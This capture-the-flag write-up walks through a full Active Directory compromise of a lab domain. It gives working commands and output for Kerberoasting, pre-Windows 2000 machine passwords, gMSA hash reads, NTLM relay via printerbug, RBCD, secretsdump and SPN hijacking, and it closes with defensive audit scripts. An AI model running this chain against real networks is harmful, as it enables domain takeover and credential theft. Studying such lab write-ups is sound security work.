                "atime_epoch": "2025-06-09 16:12:18",
                "ctime_epoch": "2025-06-08 14:39:53",
                "mtime_epoch": "2025-06-09 16:12:18",
                "size": "22 B"
            },
            "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/Audit/audit.csv": {
                "atime_epoch": "2025-06-09 16:12:18",
                "ctime_epoch": "2025-06-09 16:09:27",
                "mtime_epoch": "2025-06-09 16:12:18",
                "size": "312 B"
            },
            "pirate.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
                "atime_epoch": "2025-06-08 14:39:53",
                "ctime_epoch": "2025-06-08 14:39:53",
                "mtime_epoch": "2025-06-08 14:39:56",
                "size": "3.68 KB"
            }
        }

    Nothing of value


    Kerberoasting

    impacket-GetUserSPNs pirate.htb/pentest:'p3nt3st2025!&' -request -dc-ip 10.129.7.169
    $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb/a.white_adm*$8c19d96...9826a23a8

    This hash cannot be cracked


    LDAP

    ➜  Pirate nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --users
    LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
    LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
    LDAP        10.129.7.169    389    DC01             [*] Enumerated 7 domain users: pirate.htb
    LDAP        10.129.7.169    389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-
    LDAP        10.129.7.169    389    DC01             Administrator                 2025-06-08 14:32:36 0        Built-in account for administering the computer/domain
    LDAP        10.129.7.169    389    DC01             Guest                         <never>             0        Built-in account for guest access to the computer/domain
    LDAP        10.129.7.169    389    DC01             krbtgt                        2025-06-08 14:40:29 0        Key Distribution Center Service Account
    LDAP        10.129.7.169    389    DC01             a.white_adm                   2026-01-16 00:36:34 0
    LDAP        10.129.7.169    389    DC01             a.white                       2025-06-08 19:33:01 0
    LDAP        10.129.7.169    389    DC01             pentest                       2025-06-09 13:40:23 0
    LDAP        10.129.7.169    389    DC01             j.sparrow                     2025-06-09 15:08:44 0
    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --kerberoasting output.txt
    LDAP        10.129.7.169    389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:pirate.htb)
    LDAP        10.129.7.169    389    DC01             [+] pirate.htb\pentest:p3nt3st2025!&
    LDAP        10.129.7.169    389    DC01             [*] Skipping disabled account: krbtgt
    LDAP        10.129.7.169    389    DC01             [*] Total of records returned 2
    LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-16 00:36:34.388000, lastLogon: 2025-06-09 16:03:37.380258
    LDAP        10.129.7.169    389    DC01             $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\a.white_adm*$3d0f7...d6aa2
    LDAP        10.129.7.169    389    DC01             [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 14:48:41.108220, lastLogon: 2026-03-05 10:51:58.242422
    LDAP        10.129.7.169    389    DC01             $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3d

    Seems useless, check the groups

    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groups
    LDAP        10.129.7.169    389    DC01             Pre-Windows 2000 Compatible Access       membercount: 4

    Found an interesting group: Pre-Windows 2000 Compatible Access

    Overview

    In Active Directory (AD), the Pre-Windows 2000 Compatible Access group (with Security Identifier (SID) S-1-5-32-554) is not a code execution vulnerability but an extremely dangerous Security Misconfiguration that leads to severe Information Disclosure and paves the way for internal network penetration and privilege escalation.

    This group was originally designed to allow older operating systems like Windows NT 4.0 to query AD information. Its core security risks are mainly reflected in the following aspects:

    1. Default Overly Permissive Read Access

    The group has extensive Read permissions at the root level of Active Directory. Specifically, members of this group can read almost all user and group object attributes within the domain.

  • Danger: In domain environments upgraded from earlier systems (such as Windows Server 2000 or 2003), by default, Everyone and Authenticated Users are often members of this group.
  • Penetration Testing Perspective: This means any attacker with a low-privileged domain account (since they belong to Authenticated Users), or even unauthenticated attackers in some configurations (if Everyone includes anonymous logons), can freely query the entire domain schema via Lightweight Directory Access Protocol (LDAP).
  • 2. Anonymous Directory Enumeration

    If Everyone belongs to this group and the domain controller allows Null Session or anonymous LDAP binding:

  • An attacker can connect directly to the domain controller over the network without obtaining any credentials.
  • Using tools (like rpcclient or LDAP queries), they can enumerate all usernames, group lists, and even detailed Description fields of certain users.
  • Impact: Description fields often inadvertently contain plaintext passwords, service account purposes, or other sensitive internal information.

    3. Facilitating Advanced Domain Attacks

    The unrestricted information gathering capability provided by the Pre-Windows 2000 Compatible Access group is the cornerstone for executing subsequent advanced attacks. Attackers can easily collect the following information to formulate attack paths:

  • Targeting: Quickly identify members of high-privilege groups like Domain Admins and Enterprise Admins.
  • Kerberoasting: Enumerate service accounts with Service Principal Name (SPN) attributes, request their service tickets, and perform offline password cracking.
  • AS-REP Roasting: Query all users configured with "Do not require Kerberos preauthentication" and perform offline hash cracking against these users.
  • BloodHound Pathfinding: The group's permissions are sufficient for BloodHound to collect most node relationship graphs, thereby calculating the shortest attack path from a regular user to a domain administrator.

    4. Persistence & Backdoors

    In Red Team Operations, if an attacker gains high privileges, they may deliberately add regular users or specific backdoor accounts to the Pre-Windows 2000 Compatible Access group. Because this is a system-built-in, seemingly "compatibility" legacy group, blue teams or system administrators often overlook it during audits, allowing attackers to maintain hidden monitoring privileges over domain information.


    Remediation & Defense Measures:

    As a defender or when issuing a penetration testing report, the following remediation measures should be recommended:

  • Clean up group members: Open "Active Directory Users and Computers" (ADUC), check the members of the Pre-Windows 2000 Compatible Access group. Remove Everyone, Anonymous Logon, and Authenticated Users.
  • Add with caution: Unless there are extremely outdated legacy systems in the internal network (which typically no longer exist), this group should remain empty.
  • Disable anonymous LDAP: Ensure anonymous LDAP binding is disabled in the domain controller's registry or group policy.

    Exploitation

    Since our account is in AUTHENTICATED USERS@PIRATE.HTB (itself a member of Pre-Windows 2000 Compatible Access), we can read every user object in the domain:

    ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txt

    Look for leaked passwords in the dump

    grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
    # Nothing gained

    Attempt to read gMSA passwords

    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
    # Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers

    Only the Domain Secure Servers group can read it; check who its members are

    ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
    # Returns member: CN=MS01,CN=Computers,DC=pirate,DC=htb

    So only MS01$ can read it.


    Pre2K

    A Google search reveals nxc's pre2k module.

    Background

    By default, when a computer joins a domain, the domain controller automatically generates a 120-character, fully random machine account password (usually rolling automatically every 30 days), making brute-forcing the machine account nearly impossible.

    However, the Active Directory Users and Computers (ADUC) management tool retains a checkbox for compatibility with ancient NT systems: "Assign this computer account as a pre-Windows 2000 computer".

    If an administrator checks this box when manually pre-creating a computer account (e.g., before assigning a physical machine, just creating a placeholder in AD), something extremely absurd happens: AD does not generate a random password; instead, it directly uses the lowercase of the computer name as its initial password!

  • For example: if a machine account named SERVERDEMO$ is created, its password is serverdemo.
  • Our target is named MS01$; if it has this vulnerability, its password is ms01!

    Exploitation

    nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
    # MS01$ and EXCH01$
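As an added example that is not part of the writeup, the script below audits the all_users_attributes.txt LDIF dump produced by the earlier ldapsearch command offline: it flags computer objects carrying the PASSWD_NOTREQD flag that the pre-Windows 2000 checkbox sets (the pre2k candidates), plus the AS-REP roastable, Kerberoastable and password-in-description cases from the overview. The embedded LDIF sample is constructed; attribute names follow ldapsearch's output.

```python
# Added example (not from the writeup): offline audit of an ldapsearch LDIF dump.
import base64
import re

PASSWD_NOTREQD = 0x20               # set by the "pre-Windows 2000 computer" checkbox
WORKSTATION_TRUST_ACCOUNT = 0x1000  # computer object
DONT_REQ_PREAUTH = 0x400000         # AS-REP roastable user

def parse_ldif(text):
    # One {attr: [values]} dict per record; unfolds wrapped lines and decodes base64 values.
    text = re.sub(r"\n ", "", text)
    entries = []
    for record in re.split(r"\n\s*\n", text):
        cur = {}
        for line in record.splitlines():
            m = re.match(r"^([\w;.-]+)(::?) ?(.*)$", line)
            if m and not line.startswith("#"):
                attr, sep, val = m.groups()
                if sep == "::":
                    val = base64.b64decode(val).decode("utf-8", "replace")
                cur.setdefault(attr.lower(), []).append(val)
        if "dn" in cur:
            entries.append(cur)
    return entries

def audit(entries):
    # A pre2k hit means the computer still has its lowercase name as its password.
    out = {"pre2k": [], "asrep": [], "kerberoast": [], "leaky_description": []}
    for e in entries:
        name = e.get("samaccountname", ["?"])[0]
        uac = int(e.get("useraccountcontrol", ["0"])[0])
        if uac & WORKSTATION_TRUST_ACCOUNT and uac & PASSWD_NOTREQD:
            out["pre2k"].append(name)
        if uac & DONT_REQ_PREAUTH:
            out["asrep"].append(name)
        if "serviceprincipalname" in e and not name.endswith("$") and name != "krbtgt":
            out["kerberoast"].append(name)
        if any(re.search(r"pass|pwd", d, re.I) for d in e.get("description", [])):
            out["leaky_description"].append(name)   # the grep above, done per account
    return out

SAMPLE_LDIF = """# constructed sample in ldapsearch format; every value here is made up
dn: CN=MS01,CN=Computers,DC=pirate,DC=htb
sAMAccountName: MS01$
userAccountControl: 4128

dn: CN=svc_app,CN=Users,DC=pirate,DC=htb
sAMAccountName: svc_app
userAccountControl: 4260352
servicePrincipalName: http/app01.pirate.htb
description:: cHdkIGluIHdpa2k=
"""
```

Run it against a real dump with `audit(parse_ldif(open("all_users_attributes.txt").read()))`; the 4128 value is the userAccountControl a pre-created pre-Windows 2000 computer carries.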

    Reading gMSA

    nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsa
    Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     
    Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839    

    USER

    Connecting with evil-winrm

    evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htb

    Checking the network interfaces

    *Evil-WinRM* PS C:\Users> ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter vEthernet (Switch01):
    
       Connection-specific DNS Suffix  . :
       Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
       IPv4 Address. . . . . . . . . . . : 192.168.100.1
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . :
    
    Ethernet adapter Ethernet0 2:
    
       Connection-specific DNS Suffix  . : .htb
       IPv4 Address. . . . . . . . . . . : 10.129.7.169
       Subnet Mask . . . . . . . . . . . : 255.255.0.0
       Default Gateway . . . . . . . . . : 10.129.0.1

    Setting up a tunnel with ligolo-ng

    For setup instructions, see the ligolo-ng official website.

    Finding live hosts

    nxc smb 192.168.100.0/24
    SMB         192.168.100.1   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
    SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)

    Discovered WEB01 with SMB signing disabled. This indicates that NTLM relay attacks can be attempted.

    Checking whether the Print Spooler is running

    nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
    # Returns Spooler service enabled

    Preparing the relay

    sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
    # --remove-mic removes the Message Integrity Code

    Configuring forwarding in ligolo

    [Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add  --addr 0.0.0.0:8888 --to 127.0.0.1:445

    Executing the attack

    python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34

    Once the coerced authentication is relayed, an RBCD attack is carried out, yielding privileges on the WEB01 machine.

    Using the credentials XUPXYXWJ$:Mvb0i(gL8v$>{PG, obtain a ticket as the administrator via RBCD, then dump the NTLM hashes

    impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
    # Obtains a.white : E2nvAOKSz5Xz2MJu

    ROOT

    According to BloodHound: a.white has ForceChangePassword on a.white_ADM.

    bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
    # [+] Password changed successfully!

    a.white_ADM belongs to the IT group and has WriteSPN on DC01.PIRATE; next, enumerate the delegation relationships.

    impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1
    AccountName  AccountType  DelegationType                      DelegationRightsTo     SPN Exists
    -----------  -----------  ----------------------------------  ---------------------  ----------
    DC01$        Computer     Unconstrained                       N/A                    Yes
    a.white_adm  Person       Constrained w/ Protocol Transition  http/WEB01.pirate.htb  Yes
    a.white_adm  Person       Constrained w/ Protocol Transition  HTTP/WEB01             Yes
    XUPXYXWJ$    Computer     Resource-Based Constrained          WEB01$                 No

    SPN Hijacking

    • User a.white_adm is allowed to impersonate anyone (protocol transition) to access the HTTP service on WEB01.
    • a.white_adm has WriteSPN permission on DC01.

    Because an SPN must be unique, the delegation target http/WEB01.pirate.htb can be moved: remove it from WEB01$ and register it on DC01$, so the constrained delegation granted to a.white_adm now resolves to DC01 and lets a.white_adm access DC01 as administrator.

    Remove the SPN from WEB01$

    python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb'  -r --spn 'http/WEB01.pirate.htb'
    # Returns SPN Modified successfully

    Register it on DC01$

    python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
    # Returns SPN Modified successfully

    Obtaining the ticket

    impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
    # Returns Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
    # The -altservice parameter bypasses the protocol transition restriction

    Since the TGT is long-lived, the DC trusts it.

    impacket-smbclient -k -no-pass DC01.pirate.htb

    Root access can then be obtained.
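As an added example that is not from the writeup, the check below is what a defender would run over an LDAP snapshot to catch the SPN move performed above: it reports SPNs registered on a computer object other than the host they name, and constrained-delegation targets whose SPN is missing or now resolves to a different host. The ACCOUNTS snapshot is constructed; the account and SPN names follow the writeup, everything else is made up.

```python
# Added example (not from the writeup): flag SPNs registered on a host other than the one
# they name, and delegation targets whose SPN has been moved, as in the hijack above.

# Constructed attribute snapshot after the two addspn.py steps; host/account names follow
# the writeup, everything else is made up.
ACCOUNTS = {
    "DC01$": {"dnshostname": "DC01.pirate.htb", "allowedtodelegateto": [],
              "spns": ["HOST/DC01.pirate.htb", "ldap/DC01.pirate.htb", "http/WEB01.pirate.htb"]},
    "WEB01$": {"dnshostname": "WEB01.pirate.htb", "allowedtodelegateto": [],
               "spns": ["HOST/WEB01.pirate.htb", "HTTP/WEB01"]},
    "a.white_adm": {"dnshostname": None, "spns": [],
                    "allowedtodelegateto": ["http/WEB01.pirate.htb", "HTTP/WEB01"]},
}

def spn_host(spn):
    """Host part of service/host[:port][/name], lowercased."""
    return spn.split("/")[1].split(":")[0].lower()

def own_names(account, attrs):
    """Names an SPN on this account may legitimately carry: short name and dNSHostName."""
    names = {account.rstrip("$").lower()}
    if attrs["dnshostname"]:
        names |= {attrs["dnshostname"].lower(), attrs["dnshostname"].split(".")[0].lower()}
    return names

def find_foreign_spns(accounts):
    """Computer objects holding an SPN for another host (WEB01's SPN on DC01$ above)."""
    return [(acct, spn) for acct, attrs in accounts.items() if attrs["dnshostname"]
            for spn in attrs["spns"] if spn_host(spn) not in own_names(acct, attrs)]

def find_hijacked_delegations(accounts):
    """Delegation targets whose SPN is missing or now resolves to a different host."""
    holder = {spn.lower(): acct for acct, a in accounts.items() for spn in a["spns"]}
    hits = []
    for acct, attrs in accounts.items():
        for target in attrs["allowedtodelegateto"]:
            h = holder.get(target.lower())
            if h is None or spn_host(target) not in own_names(h, accounts[h]):
                hits.append((acct, target, h))   # h is None when the SPN was only removed
    return hits
```

Service accounts that legitimately hold SPNs for other hosts are skipped here because the check only covers objects with a dNSHostName; extend own_names with an allow-list if such accounts exist.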